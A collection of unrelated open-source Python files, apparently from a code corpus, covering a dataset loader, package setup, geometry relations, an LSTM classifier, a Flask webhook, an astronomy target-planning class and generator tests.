if dist <= D:
candi.append((dist, col, row))
if candi:
candi = sorted(candi)
dead[candi[0][1]] = 1
kill.append(candi[0])
for k in kill:
graph[k[2]][k[1]] = 0
return sum(dead)
if __name__ == '__main__':
input = __import__('sys').stdin.readline
N, M, D = map(int,input().split())
graph = [list(map(int,input().split())) for _ in range(N)]
temp = [[] for _ in range(N)]
for row in range(N):
temp[row] = graph[row][:]
case = list()
res = list()
dfs(0, 0)
print(max(res)) |
the-stack_0_12363 | import numpy as np
import matplotlib.pyplot as plt
from PIL import Image
from scipy.misc import imresize
from operator import itemgetter
import cv2
import pdb
# actions imshow convenience function
def actions_imshow(img,im_size):
plt.imshow(img.reshape([im_size,im_size,3]))
plt.axis('off')
# load Stanford-40 Actions dataset
def load_actions(path, inp_size):
# read filenames and labels
fid = open(path+"images.txt","r")
img_names = fid.read().splitlines()
fid.close()
fid = open(path+"labels.txt","r")
lbl_names = fid.read().splitlines()
fid.close()
fid = open(path+"splits.txt","r")
spl_names = fid.read().splitlines()
fid.close()
# parse splits
splits = []
for m in xrange(len(spl_names)):
splits.append(int(spl_names[m]))
# parse labels
trn_lbl = []
val_lbl = []
tst_lbl = []
for m in xrange(len(lbl_names)):
if splits[m]==3:
tst_lbl.append(int(lbl_names[m])-1)
else:
if splits[m]==2:
val_lbl.append(int(lbl_names[m])-1)
else:
trn_lbl.append(int(lbl_names[m])-1)
# parse images
trn_img = []
val_img = []
tst_img = []
for m in xrange(len(img_names)):
# read the image
data = cv2.imread(path+"JPEGImages/"+img_names[m])
#data = np.asarray(data)
if len(data.shape)==2:
data = np.repeat(data[:,:, np.newaxis], 3, axis=2)
data = imresize(data,(inp_size, inp_size, 3))
#pdb.set_trace()
# add it to the corresponding split
if splits[m]==3:
tst_img.append(data)
else:
if splits[m]==2:
val_img.append(data)
else:
trn_img.append(data)
return trn_img, val_img, tst_img, trn_lbl, val_lbl, tst_lbl
# return a new actions dataset
def disjoint_actions(actions,nums):
pos_trn = []
for i in range(len(nums)):
tmp = np.where(np.asarray(actions[3]) == nums[i])[0]
pos_trn = np.hstack((pos_trn,tmp))
pos_trn = np.asarray(pos_trn).astype(int)
np.random.shuffle(pos_trn)
pos_tst = []
for i in range(len(nums)):
tmp = np.where(np.asarray(actions[5]) == nums[i])[0]
pos_tst = np.hstack((pos_tst,tmp))
pos_tst = np.asarray(pos_tst).astype(int)
np.random.shuffle(pos_tst)
trn_img = itemgetter(*pos_trn)(actions[0])
val_img = actions[1]
tst_img = itemgetter(*pos_tst)(actions[2])
trn_lbl = itemgetter(*pos_trn)(actions[3])
val_lbl = actions[4]
tst_lbl = itemgetter(*pos_tst)(actions[5])
return trn_img, val_img, tst_img, trn_lbl, val_lbl, tst_lbl
# get equally distributed samples among given classes from a split
def get_ed_samples(data, samples=10):
# retrieve number of samples for each class
indx = []
classes = np.unique(data.labels)
for cl in range(len(classes)):
tmp = np.where(data.labels == classes[cl])[0]
np.random.shuffle(tmp)
        indx = np.hstack((indx, tmp[0:min(samples, len(tmp))]))
indx = np.asarray(indx).astype(int)
return indx
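# Usage sketch (illustrative; the path, input size and class subset are placeholders):
#   actions = load_actions('/data/Stanford40/', inp_size=224)
#   trn_img, val_img, tst_img, trn_lbl, val_lbl, tst_lbl = disjoint_actions(actions, nums=[0, 1, 2, 3, 4])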
|
the-stack_0_12365 | import setuptools
with open("README.md", "r") as f:
long_description = f.read()
setuptools.setup(
name="argtyped",
version="0.3.1",
url="https://github.com/huzecong/argtyped",
author="Zecong Hu",
author_email="[email protected]",
description="Command line arguments, with types",
long_description=long_description,
long_description_content_type="text/markdown",
license="MIT License",
packages=setuptools.find_packages(),
package_data={
"argtyped": [
"py.typed", # indicating type-checked package
],
},
platforms="any",
install_requires=[],
classifiers=[
"Development Status :: 4 - Beta",
"Environment :: Console",
"Intended Audience :: Developers",
"Intended Audience :: Science/Research",
"Operating System :: OS Independent",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3 :: Only",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Topic :: System :: Shells",
"Topic :: Utilities",
"Typing :: Typed",
],
python_requires=">=3.6",
)
|
the-stack_0_12369 | """This package includes all the modules related to data loading and preprocessing
To add a custom dataset class called 'dummy', you need to add a file called 'dummy_dataset.py' and define a subclass 'DummyDataset' inherited from BaseDataset.
You need to implement four functions:
-- <__init__>: initialize the class, first call BaseDataset.__init__(self, opt).
-- <__len__>: return the size of dataset.
-- <__getitem__>: get a data point from data loader.
-- <modify_commandline_options>: (optionally) add dataset-specific options and set default options.
Now you can use the dataset class by specifying flag '--dataset_mode dummy'.
See our template dataset class 'template_dataset.py' for more details.
"""
import importlib
import torch.utils.data
from data.base_dataset import BaseDataset
from data.base3D_dataset import BaseDataset3D
def find_dataset_using_name(dataset_name):
"""Import the module "data/[dataset_name]_dataset.py".
In the file, the class called DatasetNameDataset() will
be instantiated. It has to be a subclass of BaseDataset,
and it is case-insensitive.
"""
dataset_filename = "data." + dataset_name + "_dataset"
datasetlib = importlib.import_module(dataset_filename)
dataset = None
target_dataset_name = dataset_name.replace('_', '') + 'dataset'
for name, cls in datasetlib.__dict__.items():
if name.lower() == target_dataset_name.lower() \
and (issubclass(cls, BaseDataset) or issubclass(cls, BaseDataset3D)):
dataset = cls
if dataset is None:
raise NotImplementedError("In %s.py, there should be a subclass of BaseDataset with class name that matches %s in lowercase." % (dataset_filename, target_dataset_name))
return dataset
def get_option_setter(dataset_name):
"""Return the static method <modify_commandline_options> of the dataset class."""
dataset_class = find_dataset_using_name(dataset_name)
return dataset_class.modify_commandline_options
def create_dataset(opt):
"""Create a dataset given the option.
This function wraps the class CustomDatasetDataLoader.
This is the main interface between this package and 'train.py'/'test.py'
Example:
>>> from data import create_dataset
>>> dataset = create_dataset(opt)
"""
data_loader = CustomDatasetDataLoader(opt)
dataset = data_loader.load_data()
return dataset
class CustomDatasetDataLoader():
"""Wrapper class of Dataset class that performs multi-threaded data loading"""
def __init__(self, opt):
"""Initialize this class
Step 1: create a dataset instance given the name [dataset_mode]
Step 2: create a multi-threaded data loader.
"""
self.opt = opt
dataset_class = find_dataset_using_name(opt.dataset_mode)
self.dataset = dataset_class(opt)
print("dataset [%s] was created" % type(self.dataset).__name__)
self.dataloader = torch.utils.data.DataLoader(
self.dataset,
batch_size=opt.batch_size,
shuffle=not opt.serial_batches,
num_workers=int(opt.num_threads),
drop_last=True if opt.isTrain else False,
)
        self.i = None
        self.dataloader_iter = None
def set_epoch(self, epoch):
self.dataset.current_epoch = epoch
def load_data(self):
return self
def __len__(self):
"""Return the number of data in the dataset"""
return min(len(self.dataset), self.opt.max_dataset_size)
    def __iter__(self):
        """Return an iterator over batches, honoring max_dataset_size"""
        #for i, data in enumerate(self.dataloader):
        #    if i * self.opt.batch_size >= self.opt.max_dataset_size:
        #        break
        #    yield data
        self.i = 0
        self.dataloader_iter = iter(self.dataloader)
        return self
    def __next__(self):
        if self.i * self.opt.batch_size >= self.opt.max_dataset_size:
            raise StopIteration()
        # next() must be called on the DataLoader's iterator, not the DataLoader itself
        item = next(self.dataloader_iter)
        self.i += 1
        return item
|
the-stack_0_12371 | from itertools import chain
from typing import Iterable
from ground.base import (Context,
Location,
Orientation,
Relation)
from ground.hints import (Contour,
Multisegment,
Point,
Segment)
from . import box
from .events_queue import (CompoundEventsQueue,
LinearEventsQueue)
from .hints import SegmentEndpoints
from .multisegment import to_segments_endpoints
from .processing import (process_closed_linear_queue,
process_open_linear_queue)
from .segment import (locate_point as locate_point_to_segment,
relate_segment as relate_segments)
def locate_point(contour: Contour, point: Point, context: Context) -> Location:
return (Location.EXTERIOR
if all(locate_point_to_segment(segment, point, context)
is Location.EXTERIOR
for segment in context.contour_segments(contour))
else Location.BOUNDARY)
def relate_segment(contour: Contour,
segment: Segment,
context: Context) -> Relation:
angle_orientation = context.angle_orientation
has_no_touch = has_no_cross = True
last_touched_edge_index = last_touched_edge_start = None
start, end = segment.start, segment.end
for index, sub_segment in enumerate(context.contour_segments(contour)):
sub_segment_start, sub_segment_end = sub_segment_endpoints = (
sub_segment.start, sub_segment.end)
relation = relate_segments(sub_segment, segment, context)
if relation is Relation.COMPONENT or relation is Relation.EQUAL:
return Relation.COMPONENT
elif relation is Relation.OVERLAP or relation is Relation.COMPOSITE:
return Relation.OVERLAP
elif relation is Relation.TOUCH:
if has_no_touch:
has_no_touch = False
elif (has_no_cross
and index - last_touched_edge_index == 1
and start not in sub_segment_endpoints
and end not in sub_segment_endpoints
and (angle_orientation(start, end, sub_segment_start)
is Orientation.COLLINEAR)
and point_vertex_line_divides_angle(start,
last_touched_edge_start,
sub_segment_start,
sub_segment_end,
context)):
has_no_cross = False
last_touched_edge_index = index
last_touched_edge_start = sub_segment_start
elif has_no_cross and relation is Relation.CROSS:
has_no_cross = False
vertices = contour.vertices
if (has_no_cross
and not has_no_touch
and last_touched_edge_index == len(vertices) - 1):
first_sub_segment_endpoints = (first_sub_segment_start,
first_sub_segment_end) = (vertices[-1],
vertices[0])
if (relate_segments(context.segment_cls(first_sub_segment_start,
first_sub_segment_end),
segment,
context) is Relation.TOUCH
and start not in first_sub_segment_endpoints
and end not in first_sub_segment_endpoints
and (angle_orientation(start, end, first_sub_segment_start)
is Orientation.COLLINEAR)
and point_vertex_line_divides_angle(start, vertices[-2],
first_sub_segment_start,
first_sub_segment_end,
context)):
has_no_cross = False
return ((Relation.DISJOINT if has_no_touch else Relation.TOUCH)
if has_no_cross
else Relation.CROSS)
def point_vertex_line_divides_angle(point: Point,
first_ray_point: Point,
vertex: Point,
second_ray_point: Point,
context: Context) -> bool:
return (context.angle_orientation(vertex, first_ray_point, point)
is context.angle_orientation(vertex, point, second_ray_point))
def relate_multisegment(contour: Contour,
multisegment: Multisegment,
context: Context) -> Relation:
contour_bounding_box = context.contour_box(contour)
multisegment_bounding_box = context.segments_box(multisegment.segments)
if box.disjoint_with(contour_bounding_box, multisegment_bounding_box):
return Relation.DISJOINT
events_queue = LinearEventsQueue(context)
events_queue.register(to_edges_endpoints(contour),
from_test=False)
events_queue.register(to_segments_endpoints(multisegment),
from_test=True)
return process_open_linear_queue(events_queue,
min(contour_bounding_box.max_x,
multisegment_bounding_box.max_x))
def relate_contour(goal: Contour, test: Contour, context: Context) -> Relation:
goal_bounding_box, test_bounding_box = (context.contour_box(goal),
context.contour_box(test))
if box.disjoint_with(goal_bounding_box, test_bounding_box):
return Relation.DISJOINT
if equal(goal, test, context):
return Relation.EQUAL
events_queue = CompoundEventsQueue(context)
events_queue.register(to_oriented_edges_endpoints(goal, context),
from_test=False)
events_queue.register(to_oriented_edges_endpoints(test, context),
from_test=True)
return process_closed_linear_queue(events_queue,
min(goal_bounding_box.max_x,
test_bounding_box.max_x))
def equal(left: Contour, right: Contour, context: Context) -> bool:
left_vertices, right_vertices = left.vertices, right.vertices
if len(left_vertices) != len(right_vertices):
return False
try:
index = right_vertices.index(left_vertices[0])
except ValueError:
return False
same_oriented = orientation(left, context) is orientation(right, context)
right_step = 1 if same_oriented else -1
size = len(left_vertices)
indices = chain(zip(range(size),
range(index, size)
if same_oriented
else range(index, -1, right_step)),
zip(range(size - index if same_oriented else index + 1,
size),
range(index)
if same_oriented
else range(size - 1, index - 1, right_step)))
return all(left_vertices[left_index] == right_vertices[right_index]
for left_index, right_index in indices)
def orientation(contour: Contour, context: Context) -> Orientation:
vertices = contour.vertices
index = min(range(len(vertices)),
key=vertices.__getitem__)
return context.angle_orientation(vertices[index - 1], vertices[index],
vertices[(index + 1) % len(vertices)])
def to_edges_endpoints(contour: Contour) -> Iterable[SegmentEndpoints]:
vertices = contour.vertices
return ((vertices[index - 1], vertices[index])
for index in range(len(vertices)))
def to_oriented_edges_endpoints(contour: Contour,
context: Context,
clockwise: bool = False
) -> Iterable[SegmentEndpoints]:
vertices = contour.vertices
return (((vertices[index - 1], vertices[index])
for index in range(len(vertices)))
if (orientation(contour, context)
is (Orientation.CLOCKWISE
if clockwise
else Orientation.COUNTERCLOCKWISE))
else ((vertices[index], vertices[index - 1])
for index in range(len(vertices) - 1, -1, -1)))
|
the-stack_0_12372 |
from aiohttp import web
from tt_web import log
from tt_web import postgresql
async def on_startup(app):
await postgresql.initialize(app['config']['database'])
async def on_cleanup(app):
await postgresql.deinitialize()
def register_routers(app):
from . import handlers
app.router.add_post('/apply', handlers.apply)
app.router.add_post('/get-items', handlers.get_items)
app.router.add_post('/has-items', handlers.has_items)
app.router.add_post('/get-item-logs', handlers.get_item_logs)
app.router.add_post('/debug-clear-service', handlers.debug_clear_service)
def create_application(config):
app = web.Application()
app['config'] = config
log.initilize(config['log'])
app.on_startup.append(on_startup)
app.on_cleanup.append(on_cleanup)
register_routers(app)
return app
|
the-stack_0_12374 | """Process the raw ShEMO dataset.
This assumes the file structure from the original compressed file:
/.../
male/
*.wav
female/
...
"""
from pathlib import Path
import click
from ertk.dataset import resample_audio, write_annotations, write_filelist
from ertk.utils import PathlibPath
emotion_map = {
"A": "anger",
"H": "happiness",
"N": "neutral",
"S": "sadness",
"W": "surprise",
"F": "fear",
}
unused_emotions = ["F"]
@click.command()
@click.argument("input_dir", type=PathlibPath(exists=True, file_okay=False))
@click.option("--resample/--noresample", default=True)
def main(input_dir: Path, resample: bool):
"""Process the ShEMO dataset at location INPUT_DIR and resample
audio to 16 kHz 16-bit WAV audio.
"""
paths = list(input_dir.glob("*/*.wav"))
if resample:
resample_dir = Path("resampled")
resample_audio(paths, resample_dir)
write_filelist(resample_dir.glob("*.wav"), "files_all")
write_filelist(
[p for p in resample_dir.glob("*.wav") if p.stem[3] not in unused_emotions],
"files_5class",
)
write_annotations({p.stem: emotion_map[p.stem[3]] for p in paths}, "label")
speaker_dict = {p.stem: p.stem[:3] for p in paths}
write_annotations(speaker_dict, "speaker")
write_annotations({k: v[0] for k, v in speaker_dict.items()}, "gender")
write_annotations({p.stem: "ar" for p in paths}, "language")
if __name__ == "__main__":
main()
|
the-stack_0_12376 | import torch.nn as nn
import torch
from modules.lstm_encoder import LSTMEncoder
from modules.self_attention import SelfAttention
from modules.binary_decoder import BinaryDecoder
class BinaryLSTMClassifier(nn.Module):
def __init__(self, emb_dim, hidden_dim, vocab_size, num_label, attention_mode, args):
super(BinaryLSTMClassifier, self).__init__()
self.num_label = num_label
self.hidden_dim = hidden_dim
self.vocab_size = vocab_size
self.emb_dim = emb_dim
self.args = args
# Encoder
self.encoder = LSTMEncoder(emb_dim, hidden_dim, vocab_size, encoder_dropout=args.encoder_dropout)
if self.encoder.bidirectional:
hidden_dim = hidden_dim * 2
# Init Attention
if attention_mode == 'self':
self.att = SelfAttention
elif attention_mode == 'None':
self.att = None
if self.att is not None:
self.attention_layer = self.att(hidden_dim)
# Decoder
self.decoder = BinaryDecoder(hidden_dim, num_label)
def load_encoder_embedding(self, emb, fix_emb=False):
self.encoder.embeddings.weight = nn.Parameter(torch.FloatTensor(emb))
if fix_emb:
self.encoder.embeddings.weight.requires_grad = False
def forward(self, x, seq_len, elmo):
out, hidden = self.encoder(x, seq_len, elmo)
if self.att is not None:
out, alpha = self.attention_layer(out, seq_len.view(-1))
else:
seq_len_expand = seq_len.view(-1, 1, 1).expand(out.size(0), 1, out.size(2)) - 1
out = torch.gather(out, 1, seq_len_expand).squeeze(1)
pred = self.decoder(out)
return pred
|
the-stack_0_12377 | #!/usr/bin/env python
import urllib
import json
import os
from flask import Flask
from flask import request
from flask import make_response
# Flask app should start in global layout
app = Flask(__name__)
@app.route('/webhook', methods=['POST'])
def webhook():
req = request.get_json(silent=True, force=True)
print("Request:")
print(json.dumps(req, indent=4))
res = makeWebhookResult(req)
res = json.dumps(res, indent=4)
print(res)
r = make_response(res)
r.headers['Content-Type'] = 'application/json'
return r
def makeWebhookResult(req):
if req.get("result").get("action") != "shipping.cost":
return {}
result = req.get("result")
parameters = result.get("parameters")
zone = parameters.get("shipping-zone")
cost = {'Europe':100, 'North America':200, 'South America':300, 'Asia':400, 'Africa':500}
speech = "The cost of shipping to " + zone + " is " + str(cost[zone]) + " euros."
print("Response:")
print(speech)
return {
"speech": speech,
"displayText": speech,
"data": {},
"contextOut": [],
"source": "apiai-onlinestore-shipping"
}
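# Illustrative request payload this handler expects (abridged, API.AI/Dialogflow v1 style):
# {
#   "result": {
#     "action": "shipping.cost",
#     "parameters": {"shipping-zone": "Europe"}
#   }
# }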
if __name__ == '__main__':
port = int(os.getenv('PORT', 5000))
print("Starting app on port %d" % port)
app.run(debug=True, port=port, host='0.0.0.0')
|
the-stack_0_12378 |
from astropy.io import fits
import numpy as np
import matplotlib.pyplot as plt
import astropy.units as u
from astropy.wcs import WCS
from astropy.coordinates import SkyCoord
import pandas as pd
from photutils.aperture import SkyRectangularAperture, SkyCircularAperture
from .imaging import implot
from astroquery.skyview import SkyView
__all__ = ['Target']
class Target():
def __init__(self,name,parse_name=True,coordinates=None,coord_units=None):
'''
Initializes the Target object.
Parameters
----------
name: str
name to use for the target throughout the suite.
parse_name: bool, optional, default True
If the name is that of a known object resolvable by Simbad, parse it to determine coordinates.
coordinates: SkyCoord or str, optional, default None
If parse_name is False, supply coordinates for the target manually. Must be a SkyCoord object or string with coordinates. If string, coord_units must be supplied.
coord_units: tuple or str, optional, default None
if supplying coordinates as a string, the units as accepted by SkyCoord must be provided, e.g., (u.hourangle,u.deg) or 'deg'.
Returns
-------
None
Sets
----
configs: dict
a dictionary containing configuration information.
Notes
-----
It is not strictly necessary for the Target itself to have coordinates defined, but every configuration must.
'''
self.name = name
if parse_name:
self.coordinates = SkyCoord.from_name(name)
else:
if coordinates is not None:
if isinstance(coordinates,str):
if coord_units is None:
raise AssertionError('When providing string coordinates, a coordinate units accepted by SkyCoord are required to be passed to coord_units')
else:
self.coordinates = SkyCoord(coordinates,unit=coord_units)
elif isinstance(coordinates,SkyCoord):
self.coordinates = coordinates
self.configs = {}
def add_configuration(self,config_name,obstype=None,coordinates=None,coord_units=None,**kwargs):
'''
Add an observing configuration for this target, specifying as many fields as desired.
Parameters
----------
config_name: str
Name for this configuration. As names are eventually used in the exporting of targetlists, it is worth keeping the name short-ish, as many observatories have character limits on this column
obstype: str, optional, default None
For now, either 'imaging' or 'spectroscopy'. Some features later on depend on this.
coordinates: str or SkyCoord, optional, default None
If the coordinates of this configuration differ from the object coordinates or from other configurations, supply coordinates (either SkyCoord or string). If string, coord_units must be provided.
coord_units: tuple or str, optional, default None
If coordinates are provided as a string, a unit (e.g., (u.hourangle, u.deg) or 'deg') as accepted by SkyCoord is required.
**kwargs: optional
Any desired fields for this configuration one wants displayed later, e.g., slit pa, slit width, etc., can be added as keyword arguments with values, and will be stored.
Returns
-------
None
Sets
----
self.configs: dict
dictionary of all configuration specifications.
'''
if config_name in self.configs.keys():
cont = input(f'Config Name {config_name} already a configuration. Overwrite? [Enter yes, N for no]: ')
if cont.upper() == 'N':
return
self.configs[config_name] = {}
self.configs[config_name]['obstype']= obstype
if coordinates is not None:
if isinstance(coordinates,SkyCoord):
self.configs[config_name]['coordinates'] = coordinates
elif isinstance(coordinates,str):
if coord_units is None:
raise AssertionError('When providing string coordinates, a coordinate units accepted by SkyCoord are required to be passed to coord_units')
else:
self.configs[config_name]['coordinates'] = SkyCoord(coordinates,unit=coord_units)
elif self.coordinates is not None:
self.configs[config_name]['coordinates'] = self.coordinates
else:
self.configs[config_name]['coordinates'] = None
for i in kwargs.keys():
self.configs[config_name][i] = kwargs[i]
def remove_configuration(self,config_name):
'''
Remove a configuration from the list
Parameters
----------
config_name: str
the configuration name to remove
'''
try:
self.configs.pop(config_name)
except KeyError:
print('config not found')
return
def edit_configuration(self,config_name,quantity,value):
'''
Edit a configuration by changing the value in one of the columns.
Parameters
----------
config_name: str
the name of the configuration to edit
quantity: str
the name of the quantity (e.g., 'obstype', or a quantity added via keyword argument) to edit
value: Any
updated value. As a note, we recommend only using this for simple string/display values. Editing, e.g., coordinates this way does not run the code to make a new SkyCoord. To change the coordinates associated with a configuration, we suggest re-adding it (with the same name) but new coords to overwrite it.
'''
try:
self.configs[config_name][quantity] = value
except KeyError:
print('configuration name not found')
return
def add_offset_star(self,coordinate,coord_units=None,configurations='all'):
'''
        Add an offset star to the configuration. Offset stars are used to execute blind offsets when a source is too faint to see in typical acquisition exposures.
        If an offset star is provided, the offsets between the star and the configuration's coordinates (in arcsec east and north) are automatically calculated and added to the configuration.
Parameters
----------
coordinate: str or SkyCoord
coordinates of the offset star. Either SkyCoord object or string. If string provided, must also provide coord_units for creation of SkyCoord object.
coord_units: tuple or str, optional, default None
if coordinates provided as a string, units acceptable by SkyCoord (e.g., (u.hourangle, u.deg) or 'deg') must be provided here.
configurations: str or list, optional, default 'all'
Which configurations to apply this offset star to. Default is 'all', one can pass individual configuration names as strings, or a list of configuration names (as strings).
Returns
-------
None
Sets
----
Sets the 'offset star' key for the chosen configuration(s) as the star coordinates and the 'offsets' key to the offsets, visible via view_configurations().
'''
if isinstance(coordinate,str):
if coord_units is not None:
coord = SkyCoord(coordinate,unit=coord_units)
else:
raise AssertionError('If string coordinate provided, units must be provided for SkyCoord creation')
elif isinstance(coordinate,SkyCoord):
coord = coordinate
if configurations=='all':
for i in self.configs.keys():
os = coord.spherical_offsets_to(self.configs[i]['coordinates'])
os = [os[0].to(u.arcsec).value,os[1].to(u.arcsec).value]
add_str = f'''{os[0]:.3f}'' E, {os[1]:.3f}'' N'''
self.configs[i]['offset star'] = coord
self.configs[i]['offsets'] = add_str
elif isinstance(configurations,str):
os = coord.spherical_offsets_to(self.configs[configurations]['coordinates'])
os = [os[0].to(u.arcsec).value,os[1].to(u.arcsec).value]
add_str = f'''{os[0]:.3f}'' E, {os[1]:.3f}'' N'''
self.configs[configurations]['offset star'] = coord
self.configs[configurations]['offsets'] = add_str
elif isinstance(configurations,list):
for i in configurations:
os = coord.spherical_offsets_to(self.configs[i]['coordinates'])
os = [os[0].to(u.arcsec).value,os[1].to(u.arcsec).value]
add_str = f'''{os[0]:.3f}'' E, {os[1]:.3f}'' N'''
self.configs[i]['offset star'] = coord
self.configs[i]['offsets'] = add_str
def set_survey(self,survey_name):
self.survey_name = survey_name
def retrieve_finder_chart(self,config_name,size,pixels=500,show_aperture=True,**implot_kwargs):
'''
Retrieve a DSS image (finder chart) around the target. If obsmode is spectroscopy, optionally show the location of the slit or circular fiber on the image.
Parameters
----------
config_name: str
name of the configuration to retrieve finder for
size: astropy Quantity
dimensions of the finder box to use. Box is square.
pixels: int, optional (default 500)
dimensions (in pixels) of the image to retrieve. (Larger downloads take longer).
show_aperture: bool, optional (default True)
flag for whether to show an apertuer (rectangular slits and circular apertures supported). If this flag turned on, the following must be true.
For slits, your configuration must have properties `slit_width`, `slit_length`, and `PA`.
For circular apertures, your configuration must have a property `fiber_radius`.
**implot_kwargs: optional
arguments passed to the utility function `implot` to display the image. These include scale (images are scaled about their mean pixel value), colorbar flag, etc.
Returns
-------
fig, ax: matplotlib figure and axes objects
the fig and ax on which the dss image and possible aperture was plotted.
'''
sv = SkyView()
if hasattr(self,'survey_name'):
survey=self.survey_name
else:
survey='SDSSdr7g'
paths = sv.get_images(position=self.configs[config_name]['coordinates'],
survey=[survey],
coordinates='J2000',
width=size,
height=size,
grid=True,
gridlabels=True,
pixels=str(pixels))
image = paths[0][0].data
wcs = WCS(paths[0][0].header)
fig, ax = implot(image,wcs=wcs,cmap='gray',**implot_kwargs)
if show_aperture:
if self.configs[config_name].keys() >= {'slit_width','slit_length','PA'}:
slit = SkyRectangularAperture(self.configs[config_name]['coordinates'],
w=self.configs[config_name]['slit_width'],
h=self.configs[config_name]['slit_length'],
theta=self.configs[config_name]['PA']+90*u.deg)
slit.to_pixel(wcs).plot(color='r',lw=3)
elif self.configs[config_name].keys() >= {'fiber_radius'}:
fiber = SkyCircularAperture(self.configs[config_name]['coordinates'],
r=self.configs[config_name]['fiber_radius'])
fiber.to_pixel(wcs).plot(color='r',lw=3)
else:
                raise KeyError('''show_aperture set to True, but this configuration does not have 'slit_width','slit_length', and 'PA' set, which are needed for slit display, or 'fiber_radius' set, for circular aperture.''')
return fig, ax
def add_custom_image(self,config_name,image_name,image,wcs=None):
'''
Add a custom image of your target. Allows for your image to be added to the observing plan along with, e.g., retrieved DSS imaging.
Parameters
----------
config_name: str or list
configuration for which this image should apply. Can be a single configuration string, a list of configuration strings, or 'all'.
image_name: str
a name for the image (for later plotting and access).
image: array_like
the array containing the image
wcs: astropy.WCS, optional (default None)
a wcs object defining the coordinates of the image. This must be provided for some functionality, like overplotting slits/apertures.
'''
        self.configs[config_name].setdefault('user_images', {})
        self.configs[config_name]['user_images'][image_name] = {}
self.configs[config_name]['user_images'][image_name]['image'] = image
self.configs[config_name]['user_images'][image_name]['wcs'] = wcs
def show_custom_image(self,config_name,image_name,show_aperture=True,**implot_kwargs):
'''
Display the custom image provided by user. If possible, show aperture (slit/fiber) over it.
'''
image = self.configs[config_name]['user_images'][image_name]['image']
wcs = self.configs[config_name]['user_images'][image_name]['wcs']
fig, ax = implot(image,wcs=wcs,cmap='gray',**implot_kwargs)
if show_aperture:
if self.configs[config_name].keys() >= {'slit_width','slit_length','PA'}:
slit = SkyRectangularAperture(self.configs[config_name]['coordinates'],
w=self.configs[config_name]['slit_width'],
h=self.configs[config_name]['slit_length'],
theta=self.configs[config_name]['PA'])
slit.to_pixel(wcs).plot(color='r',lw=3)
elif self.configs[config_name].keys() >= {'fiber_radius'}:
fiber = SkyCircularAperture(self.configs[config_name]['coordinates'],
r=self.configs[config_name]['fiber_radius'])
fiber.to_pixel(wcs).plot(color='r',lw=3)
else:
                raise KeyError('''show_aperture set to True, but this configuration does not have 'slit_width','slit_length', and 'PA' set, which are needed for slit display, or 'fiber_radius' set, for circular aperture.''')
return fig, ax
def list_configurations(self):
df = pd.DataFrame.from_dict(self.configs,orient='index')
df['coordinates'] = [i.to_string() for i in df['coordinates'] if isinstance(i,SkyCoord)]
if 'offset star' in df.columns:
df['offset star'] = [i.to_string() if isinstance(i,SkyCoord) else np.nan for i in df['offset star']]
if 'user_images' in df.columns:
df['user_images'] = ['Y' if isinstance(i,dict) else np.nan for i in df['user_images']]
df.index.name = 'configurations'
df = df.replace({np.nan: '---'})
return df
def nudge_configuration(self,config_name,arcsec_east,arcsec_north):
'''
Nudge the coordinates of a configuration east or north in arcsec
for better alignment.
Parameters
----------
config_name: str
name of configuration to nudge
arcsec_east: float
amount to nudge east (west is negative) in arcsec
arcsec_north: float
amount to nudge north (south is negative) in arcsec
'''
        new_coordinate = self.configs[config_name]['coordinates'].directional_offset_by(0*u.deg, arcsec_north*u.arcsec)
        new_coordinate = new_coordinate.directional_offset_by(90*u.deg, arcsec_east*u.arcsec)
self.configs[config_name]['coordinates'] = new_coordinate
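    # Example end-to-end usage of this class (illustrative; the slit values below are
    # assumptions, not defaults):
    #
    #   m82 = Target('M82')
    #   m82.add_configuration('slit1', obstype='spectroscopy',
    #                         slit_width=1.0*u.arcsec, slit_length=120*u.arcsec, PA=45*u.deg)
    #   fig, ax = m82.retrieve_finder_chart('slit1', size=5*u.arcmin)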
@property
def configurations(self):
return self.list_configurations() |
the-stack_0_12379 | # pylint: disable=too-few-public-methods,no-self-use
"""Tests for datastream generator module"""
from builtins import next
import unittest
import pytest
from past.builtins import map, range
from mock import mock_open, patch
from bcipy.acquisition.datastream.generator import random_data, file_data
from bcipy.acquisition.util import mock_data
class CustomEncoder():
"""Encodes data by prefixing with the count."""
def __init__(self):
super(CustomEncoder, self).__init__()
self.counter = 0
def encode(self, data):
"""Encode the data."""
self.counter += 1
return (self.counter, data)
class TestGenerator(unittest.TestCase):
"""Tests for Generator"""
def test_random_generator(self):
"""Test default parameters for random generator"""
gen = random_data()
data = [next(gen) for _ in range(100)]
self.assertEqual(len(data), 100)
def test_random_high_low_values(self):
"""Random generator should allow user to set value ranges."""
channel_count = 10
low = -100
high = 100
gen = random_data(low=-100, high=100,
channel_count=channel_count)
data = [next(gen) for _ in range(100)]
self.assertEqual(len(data), 100)
for record in data:
self.assertEqual(len(record), channel_count)
for value in record:
self.assertTrue(low <= value <= high)
def test_random_with_custom_encoder(self):
"""Random generator should allow a custom encoder."""
channel_count = 10
gen = random_data(encoder=CustomEncoder(),
channel_count=channel_count)
data = [next(gen) for _ in range(100)]
self.assertEqual(len(data), 100)
for _count, record in data:
self.assertEqual(len(record), channel_count)
self.assertEqual(data[0][0], 1)
self.assertEqual(data[99][0], 100)
def test_file_generator(self):
"""Should stream data from a file."""
row_count = 100
header = ['col1,col2,col3']
data = list(mock_data(row_count, len(header)))
rows = map(lambda x: ','.join(map(str, x)), data)
test_data = '\n'.join(header + rows)
with patch('bcipy.acquisition.datastream.generator.open',
mock_open(read_data=test_data), create=True):
gen = file_data(filename='foo', header_row=1)
generated_data = [next(gen) for _ in range(row_count)]
for i, row in enumerate(generated_data):
self.assertEqual(row, data[i])
def test_file_generator_end(self):
"""Should throw an exception when all data has been consumed"""
row_count = 10
header = ['col1,col2,col3']
data = list(mock_data(row_count, len(header)))
rows = map(lambda x: ','.join(map(str, x)), data)
test_data = '\n'.join(header + rows)
with patch('bcipy.acquisition.datastream.generator.open',
mock_open(read_data=test_data), create=True):
gen = file_data(filename='foo', header_row=1)
# exhaust the generator
for _ in range(row_count):
next(gen)
with pytest.raises(StopIteration):
data.append(next(gen))
def test_file_with_custom_encoder(self):
"""Should allow a custom encoder"""
col_count = 3
row_count = 100
header = ['col1,col2,col3']
data = [[float(cnum + rnum) for cnum in range(col_count)]
for rnum in range(row_count)]
rows = map(lambda x: ','.join(map(str, x)), data)
test_data = '\n'.join(header + rows)
with patch('bcipy.acquisition.datastream.generator.open',
mock_open(read_data=test_data), create=True):
gen = file_data(
